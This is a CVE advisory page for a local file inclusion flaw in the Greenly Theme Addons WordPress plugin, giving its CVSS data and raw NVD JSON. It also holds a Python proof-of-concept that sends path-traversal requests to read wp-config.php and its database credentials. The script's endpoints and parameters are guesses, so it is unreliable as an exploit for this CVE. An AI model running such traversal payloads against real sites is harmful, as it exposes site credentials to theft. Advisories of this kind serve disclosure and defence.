Security Vulnerability Report
中文
CVE-2026-32393 CVSS 7.5 HIGH

CVE-2026-32393

Published: 2026-03-13 19:54:55
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly Theme Addons greenly-addons allows PHP Local File Inclusion.This issue affects Greenly Theme Addons: from n/a through < 8.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

greenly-addons < 8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32393 PoC - Greenly Theme Addons LFI # Target: WordPress site with vulnerable greenly-addons plugin import requests import argparse def test_lfi(target_url, filename='wp-config.php'): """ Test for Local File Inclusion vulnerability Attempts to include wp-config.php or other sensitive files """ # Common vulnerable parameter patterns params = { 'file': f'../../../../../../../../{filename}', 'template': f'../../../../../../../../{filename}', 'page': f'../../../../../../../../{filename}', 'action': f'../../../../../../../../{filename}' } # Common vulnerable endpoints endpoints = [ '/wp-content/plugins/greenly-addons/includes/loader.php', '/wp-content/plugins/greenly-addons/public/partials/loader.php', '/wp-content/themes/greenly/inc/loader.php' ] print(f'[*] Testing target: {target_url}') print(f'[*] Attempting to include: {filename}') for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f'\n[*] Testing endpoint: {url}') for param_name, payload in params.items(): try: response = requests.get(url, params={param_name: payload}, timeout=10) # Check for successful inclusion if 'DB_NAME' in response.text or 'define' in response.text: print(f'[+] VULNERABLE! Parameter: {param_name}') print(f'[+] Payload: {payload}') print(f'[+] Response length: {len(response.text)}') return True except requests.RequestException as e: print(f'[-] Request failed: {e}') print('[-] No vulnerable endpoint found') return False if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2026-32393 PoC') parser.add_argument('-t', '--target', required=True, help='Target URL') parser.add_argument('-f', '--file', default='wp-config.php', help='File to include') args = parser.parse_args() test_lfi(args.target, args.file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32393", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:54.857", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Creatives_Planet Greenly Theme Addons greenly-addons allows PHP Local File Inclusion.This issue affects Greenly Theme Addons: from n/a through < 8.2."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en un programa PHP, vulnerabilidad ('inclusión remota de ficheros PHP') en Creatives_Planet Greenly Theme Addons greenly-addons permite la inclusión local de ficheros PHP. Este problema afecta a Greenly Theme Addons: desde n/a hasta &lt; 8.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/greenly-addons/vulnerability/wordpress-greenly-theme-addons-plugin-8-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}